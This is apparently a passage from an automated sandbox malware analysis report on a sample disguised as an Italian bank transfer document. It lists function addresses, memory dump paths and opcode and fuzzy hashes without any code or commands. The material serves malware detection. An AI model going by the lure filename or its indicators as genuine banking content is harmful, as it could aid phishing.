                                  • Instruction ID: b4cc4140e520b60c7907bb8cd39f9b8ff337a169507e010fcd04f2c8dd570de2
                                  • Opcode Fuzzy Hash: 6003336bfc0ed35e6cc4f83b2e0ae1315977f75248b53ee0a950a3b2c15a3c23
                                  • Instruction Fuzzy Hash: 16419D30B002859FEB15DB69C484BADBBF6AF89704F14406DE50AAB3A1CB75ED01CB90
                                  Function 06C05FBA Relevance: .1, Instructions: 126COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 77595575e80cab4f686f52c504f7b7a32f0e805946ec27097c5a284d9eb9c31f
                                  • Instruction ID: 6c15dbb86908ffd2b55f3f9a1ece1578ce6700368d32f412fd267bca72f6c1e0
                                  • Opcode Fuzzy Hash: 77595575e80cab4f686f52c504f7b7a32f0e805946ec27097c5a284d9eb9c31f
                                  • Instruction Fuzzy Hash: 4441D1B590ABC08FD3229B3A98655417FF0AF8630270A89DBC5C5CF6B3D6359819C723
                                  Function 06C0EA80 Relevance: .1, Instructions: 118COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: badcc22c2e46b1f25d5a82b198e7731f1da44e37a8050c7e1a681e7357f7b544
                                  • Instruction ID: 1e0f52af53efa99ebce5f018773298f416d93097e34ff52c88d2bf22b4c6f870
                                  • Opcode Fuzzy Hash: badcc22c2e46b1f25d5a82b198e7731f1da44e37a8050c7e1a681e7357f7b544
                                  • Instruction Fuzzy Hash: 82415F70D49218CFEB48CB9AC4506FEFBF6AB8D300F14D46AD41AA7291D7344A41CBA4
                                  Function 06C0F577 Relevance: .1, Instructions: 107COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bb011afa140ed99ddad81017da020b0561769e2b1749a1cad0165bf8586d512b
                                  • Instruction ID: acee579f7d301b650a20ad543bb4d4439fb4fabf23ffde50692ff72afa8607ca
                                  • Opcode Fuzzy Hash: bb011afa140ed99ddad81017da020b0561769e2b1749a1cad0165bf8586d512b
                                  • Instruction Fuzzy Hash: 4B41B9B8D09258CFEBA4CFA6D5405EDBBFAFB4D300F10905AD929A7251D7349981CF90
                                  Function 06C08DA4 Relevance: .1, Instructions: 100COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 074f25f23ef28edb28e360b67cd5f04f8887fc09abeaa4a8fbfb98ed4cabf1d3
                                  • Instruction ID: c545db9125922eceacf8eec0db04ffa1cb9878e90098cfd1c6b059a265fa060c
                                  • Opcode Fuzzy Hash: 074f25f23ef28edb28e360b67cd5f04f8887fc09abeaa4a8fbfb98ed4cabf1d3
                                  • Instruction Fuzzy Hash: 89315B75A00309AFDF50CFA9D844ADEBFF9EB49310F10842AE815A7351D775A944CFA4
                                  Function 06C0F2DF Relevance: .1, Instructions: 99COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 670b82d9702275ccd4955d9cb3e4ef4d9e45fee1510a1cd99d762ec62382b11d
                                  • Instruction ID: e2fed4aedac20f8b9200e28f580c5961337aef710fadf5db7b284b2562768986
                                  • Opcode Fuzzy Hash: 670b82d9702275ccd4955d9cb3e4ef4d9e45fee1510a1cd99d762ec62382b11d
                                  • Instruction Fuzzy Hash: 4441C9B4D09218CFEBA4CF6AC9406EDB7B6BB49300F11959AD92AA7341D7309A81CF50
                                  Function 06C0DAB4 Relevance: .1, Instructions: 94COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ce406aab35b64e9eb3b2bb4b9b6c9ead22daf4c5cd138512e35af0e94ff214ff
                                  • Instruction ID: 232cecf630aaac46dc2ce696e8b576e46de447254170f131e9893727219f6578
                                  • Opcode Fuzzy Hash: ce406aab35b64e9eb3b2bb4b9b6c9ead22daf4c5cd138512e35af0e94ff214ff
                                  • Instruction Fuzzy Hash: 8B31397490A218CFFB94DB9AC9847EDFBB9BF49300F149595C00AA7286C770A981CF90
                                  Function 06C0B8C8 Relevance: .1, Instructions: 93COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9dd6323239bf9c3a355c0d79f3b87d851959bba1fab1c8ec8320624d973b79d4
                                  • Instruction ID: 8e918994e4cbe3d62ab7b3a26ea0233e62848e668918bff1896c9763ceafd1cf
                                  • Opcode Fuzzy Hash: 9dd6323239bf9c3a355c0d79f3b87d851959bba1fab1c8ec8320624d973b79d4
                                  • Instruction Fuzzy Hash: B9315C74E05209DFEB44CFAAC5406AEBFB6EF99300F1481AAC415AB3A1E7359E40CF51
                                  Function 06C064C0 Relevance: .1, Instructions: 91COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9a6c3d1aa0acaddc89012df23b0e2f785baa43e0166c3671f22071a808e27397
                                  • Instruction ID: 909801e361c5c1696101ecfa0f35ea644cb4ce1ed207cd507b25adb44d8dbb6a
                                  • Opcode Fuzzy Hash: 9a6c3d1aa0acaddc89012df23b0e2f785baa43e0166c3671f22071a808e27397
                                  • Instruction Fuzzy Hash: 762148B56083109FF7948F6AA82037A3BA2E784311F04446BE546CF2C6EF35D91487A1
                                  Function 06C0BA00 Relevance: .1, Instructions: 88COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 16a88c697a30e2c95a3e2de926f28f566cf21b42c37456a77a583e46d39a2b69
                                  • Instruction ID: b5370683c32c54c5680fc3c80f33616aaf8ac3d992e483db9afda2bd1a62d5da
                                  • Opcode Fuzzy Hash: 16a88c697a30e2c95a3e2de926f28f566cf21b42c37456a77a583e46d39a2b69
                                  • Instruction Fuzzy Hash: 93319070E05209EFEB84DFA9D580AAEBFB6EF59300F1084AAD405A73A1D7359E40CF51
                                  Function 06C0F47C Relevance: .1, Instructions: 86COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8814eceb1e499a8b0c3174201851ea8651622fb64474eedc975f0572ab3fbaaf
                                  • Instruction ID: 6c7a420994907df711ff28038aa856013d212577ab04caea5cd3135f05eb735e
                                  • Opcode Fuzzy Hash: 8814eceb1e499a8b0c3174201851ea8651622fb64474eedc975f0572ab3fbaaf
                                  • Instruction Fuzzy Hash: C431FAB4D09208CFFBA4CFA6C5405EDBBBAAB49300F00941ED92AA7281D73495818F90
                                  Function 06C087F8 Relevance: .1, Instructions: 81COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 90f956233601344d2ee9836e0f96dbbb89bad483d030344d1e0ef8ab1db90cd7
                                  • Instruction ID: 0b4f2b5411150d9ed8a578b12fe02dfc0903a21a04d24a59812609835525e074
                                  • Opcode Fuzzy Hash: 90f956233601344d2ee9836e0f96dbbb89bad483d030344d1e0ef8ab1db90cd7
                                  • Instruction Fuzzy Hash: 9D3102B4E02619DFDF44CFAAD8545EEBBB2BB88301F10816AD915B7394E7345902CF91
                                  Function 06C0F507 Relevance: .1, Instructions: 81COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b47e4039b95c30da2ec12cd6dce9d7e40d2020b7d5914a2a6a8f958cfa843144
                                  • Instruction ID: 300b8745ad2159ac7918768df390e259bc30b7c59daf3383163c352688354a68
                                  • Opcode Fuzzy Hash: b47e4039b95c30da2ec12cd6dce9d7e40d2020b7d5914a2a6a8f958cfa843144
                                  • Instruction Fuzzy Hash: 3031FBB4D09248CFFB64CFA6C5545EDBBBABB4D300F10A05AD92AA7281D7349981CF90
                                  Function 06C0EF19 Relevance: .1, Instructions: 80COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4180b09cdba634b6a67ff341b39a863c93bbb7426f79211c2a85f84b173e6454
                                  • Instruction ID: 45ad9f5e4c1b3b4c7765d930270f6df5aebe44d6a4b36f69757ed422c1a9dd81
                                  • Opcode Fuzzy Hash: 4180b09cdba634b6a67ff341b39a863c93bbb7426f79211c2a85f84b173e6454
                                  • Instruction Fuzzy Hash: 6D2186B4D4A20CEFEB44DFA9E0406EDBBF9EB49300F1081AAD90997791D7319A41CF81
                                  Function 06C0F9DB Relevance: .1, Instructions: 80COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 01a20f2e64d8572a1c22ed37684c780c5cb449298f52efdf25f7e9ef611ef4b1
                                  • Instruction ID: e4551742d05a692a567654a48d76321a9352c1618f9710e90fa33de807885fbb
                                  • Opcode Fuzzy Hash: 01a20f2e64d8572a1c22ed37684c780c5cb449298f52efdf25f7e9ef611ef4b1
                                  • Instruction Fuzzy Hash: EA313EB4D0D208CFFBA4CF56C5445EDB7BAFB49300F11A06AD92A67291C3309981CF90
                                  Function 06C0FBFA Relevance: .1, Instructions: 76COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 98333625ba030c29884cd8604e3c7ba6df7f2e84cbb97419c65e0d9c351e628a
                                  • Instruction ID: 47097fe79e7e69ddc3d05bc82cdb0e5a3641fac4921737c16bde399c480fb700
                                  • Opcode Fuzzy Hash: 98333625ba030c29884cd8604e3c7ba6df7f2e84cbb97419c65e0d9c351e628a
                                  • Instruction Fuzzy Hash: E53149B0D09208CFEB64CFA9C4A46ECBBB5FF0D305F14819AD825A7291D3389585CF54
                                  Function 00BFD3D8 Relevance: .1, Instructions: 75COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1359580754.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bfd000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d0b5445d404d8f5d5c96a922397a6b592f01056ed29a53aa2fa89f9405f5c365
                                  • Instruction ID: cbd99aeb2bc1846b1cb82fcc4ca380652c2a000bb323dc110778fdafc0a609d7
                                  • Opcode Fuzzy Hash: d0b5445d404d8f5d5c96a922397a6b592f01056ed29a53aa2fa89f9405f5c365
                                  • Instruction Fuzzy Hash: 4321F875504248DFDB05DF14D9C0B26BFA6FB98324F24C5A9EA090B356C336E85AC6A2
                                  Function 00BFD4C4 Relevance: .1, Instructions: 75COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1359580754.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bfd000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b1648bcffeb4fcdc70fa4948c82b89d48ad110f1467f1229c48bed958392cb02
                                  • Instruction ID: 54d3bdfaa758292ac20fe7dc6767af4d06e223811239bb4edd70756a3edc9617
                                  • Opcode Fuzzy Hash: b1648bcffeb4fcdc70fa4948c82b89d48ad110f1467f1229c48bed958392cb02
                                  • Instruction Fuzzy Hash: 88213771500248DFDB05DF14D9C0F36BFA6FB98318F20C5A9EA050B256C336D81ADBA2
                                  Function 06C061E0 Relevance: .1, Instructions: 73COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c255148429b580be9f85350732170a1d2d55d21ea187d20a70fe3254a6ad9f05
                                  • Instruction ID: d8be7e9c48dd05f6817a0bd5b6607ff4f1d0ccafc22db0492a7280b2c802ee58
                                  • Opcode Fuzzy Hash: c255148429b580be9f85350732170a1d2d55d21ea187d20a70fe3254a6ad9f05
                                  • Instruction Fuzzy Hash: 50215CB16043049FF3624F1BEC59F2A7BA9EB85711F050866F146CB2D1C6759E10CBA1
                                  Function 06C0F203 Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b5a4d95e1335d739521786385524c3454297d487fb0dcdcf95a1ccf47d7960b3
                                  • Instruction ID: 76b18f5a9e7348af6c34ac406fe82e806f5e6caeccf9c50d4cec8deb77d8bd10
                                  • Opcode Fuzzy Hash: b5a4d95e1335d739521786385524c3454297d487fb0dcdcf95a1ccf47d7960b3
                                  • Instruction Fuzzy Hash: F221607490E244CFFBA5CF66C5504FDBBBAEB4A300B04A49EC929AB282D3305585CF90
                                  Function 06C0F224 Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 53617dff4556472b5a14e21cd1a5e62bf621b0904184174387b113ab12d11514
                                  • Instruction ID: 6e9901882b0adf4d75cc56d7cc2cbf73619938054d85b7c0713c180a036357ba
                                  • Opcode Fuzzy Hash: 53617dff4556472b5a14e21cd1a5e62bf621b0904184174387b113ab12d11514
                                  • Instruction Fuzzy Hash: 5121CDB4D09219CFFBA4CF56C5546FDB7BAAB5D300F01505AD92AA7281D3349A81CF90
                                  Function 00C0D1D4 Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1359648354.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c0d000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 662243b0904578220a08547acdec898fecb964016ffcace9f586de4d6e410ff0
                                  • Instruction ID: b7d1b35813b8a7adb0f69595a5895cae86851a027e75d6f1e3b54a01905a1aa0
                                  • Opcode Fuzzy Hash: 662243b0904578220a08547acdec898fecb964016ffcace9f586de4d6e410ff0
                                  • Instruction Fuzzy Hash: 03212371604300EFDB05DF98D9C0B26BBA5FB88314F20C6ADE84A4B2D6C336DD46CA61
                                  Function 00C0D01C Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1359648354.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c0d000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 27f229643428ac124d516382fd194b541d9293eaa7c0bb470f8cfe425465add0
                                  • Instruction ID: 664da047be02bca40c667cf19ca9ab2b649d2ceb18361a5d8f2c8fd242a7899c
                                  • Opcode Fuzzy Hash: 27f229643428ac124d516382fd194b541d9293eaa7c0bb470f8cfe425465add0
                                  • Instruction Fuzzy Hash: 6721F275604240DFDB14DF58D9C0B26BB65EB88318F20C5ADE84E4B296C336D807CA62
                                  Function 06C051A2 Relevance: .1, Instructions: 67COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5ea622d6a84fba0bd6f5bc4455078f762a6d698b1933406b3a530de1e8696dba
                                  • Instruction ID: 968a8921f834a674617ae7ebee6da6bb72415e894881813cfef7afe48d27b4fa
                                  • Opcode Fuzzy Hash: 5ea622d6a84fba0bd6f5bc4455078f762a6d698b1933406b3a530de1e8696dba
                                  • Instruction Fuzzy Hash: 512107B4E05609DFDB44DFA5DA445AEBBF2AB88300F6494AA8915A7394E7308B41CF90
                                  Function 06C0491C Relevance: .1, Instructions: 67COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a6a98f9898eba78aacadd44e38b1d259f32eb740a1fbec8d49fd86071cb80b09
                                  • Instruction ID: 52d0b53eb4074ea0a59fb57fca44a768f4dcada0085dd85b0195f69d2c54fbd0
                                  • Opcode Fuzzy Hash: a6a98f9898eba78aacadd44e38b1d259f32eb740a1fbec8d49fd86071cb80b09
                                  • Instruction Fuzzy Hash: 6031F5B0D01258DFEB60DF9AC588B8EBFF5EB08314F208469E405BB281C7B59945CF95
                                  Function 06C09106 Relevance: .1, Instructions: 66COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 036271695ce7fb0dac0d7ce198c996d9a5e81e66120018d80b27b79e91d101b6
                                  • Instruction ID: bca42b8f4f141b7b29757d12800ba77becbe522c37dbbbc1044bc1e5fe3ff259
                                  • Opcode Fuzzy Hash: 036271695ce7fb0dac0d7ce198c996d9a5e81e66120018d80b27b79e91d101b6
                                  • Instruction Fuzzy Hash: 1D21F3B0D01258DFEB60DF99C588BCEBFF5AB08314F24846AE405BB291C7749945CFA0
                                  Function 06C0EBB9 Relevance: .1, Instructions: 66COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f77350c3e4e21a8d9c90b470614063f3df9c84a9d142eed84604499f106c8e47
                                  • Instruction ID: a39ce2f523ebc676e96e4265ac77476a46699edba0b020bfd86830d8e0dc6731
                                  • Opcode Fuzzy Hash: f77350c3e4e21a8d9c90b470614063f3df9c84a9d142eed84604499f106c8e47
                                  • Instruction Fuzzy Hash: 3C21FCB4D49249DFDB84DFA9C5809AEBBF5EB4D300F20549AD409A7792D3319E40CF91
                                  Function 06C0F1D1 Relevance: .1, Instructions: 63COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3f1d8dc6004dccc62f80cba1ac6f41dc0239f371fd4199022278c76e126cd717
                                  • Instruction ID: 9a944b39b1052d3ec116afcff25a8573c709d7804fe09522f29cdf45dde4e17e
                                  • Opcode Fuzzy Hash: 3f1d8dc6004dccc62f80cba1ac6f41dc0239f371fd4199022278c76e126cd717
                                  • Instruction Fuzzy Hash: 3511BAB4D0D208CFFBA4CF96C5505FDB7BAAB4D300B11A45AD92AA7241D33499818F94
                                  Function 00C0D005 Relevance: .1, Instructions: 62COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1359648354.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c0d000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ff30a840d619e34613b51980f1397ba8ef397a19bb8d8d0dd75502f1efbbac8f
                                  • Instruction ID: 6cce671f4c6727e2e44c6b7a8f24a9555c4e668d487c16e8f1b4f86555039004
                                  • Opcode Fuzzy Hash: ff30a840d619e34613b51980f1397ba8ef397a19bb8d8d0dd75502f1efbbac8f
                                  • Instruction Fuzzy Hash: 672192755093C08FCB02CF24D990715BF71EB46314F29C5EAD8898F6A7C33A980ACB62
                                  Function 06C0EBC8 Relevance: .1, Instructions: 59COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a61fdf28efe2433cabf870adc85a1e58efe350849fc23d01a9e45e3d83c16d76
                                  • Instruction ID: 865f514ba936daaf10ad0b7a48a5a84dbe77723f9794d420cbf5cde24b836bd2
                                  • Opcode Fuzzy Hash: a61fdf28efe2433cabf870adc85a1e58efe350849fc23d01a9e45e3d83c16d76
                                  • Instruction Fuzzy Hash: 0521B6B4E49209DFDB84DFAAC1809AEBBF5AB4D300F209499D809A7791D7319E40CF91
                                  Function 06C01B00 Relevance: .1, Instructions: 58COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 40b58e2a0a636d860e68321438dd94a6df798c8ff6d42d50352cf3eeb18ebea4
                                  • Instruction ID: 9f299673e8e8eff053714ec3034d73a9fd6d18662f07c0661401cbcb38edc871
                                  • Opcode Fuzzy Hash: 40b58e2a0a636d860e68321438dd94a6df798c8ff6d42d50352cf3eeb18ebea4
                                  • Instruction Fuzzy Hash: 7A218832910B5286DB11DF69D850282B371FF94324F198ABADC4D3F24AEB717584CBA0
                                  Function 06C08F50 Relevance: .1, Instructions: 57COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f3975d6839b54ef3a4b90fd85c8c27a5731eaa471579107c81df18b86c622263
                                  • Instruction ID: 8b2abbf077c3b19fa37797f14f9001183f3cb28391f1b0634e88093aea88d5ad
                                  • Opcode Fuzzy Hash: f3975d6839b54ef3a4b90fd85c8c27a5731eaa471579107c81df18b86c622263
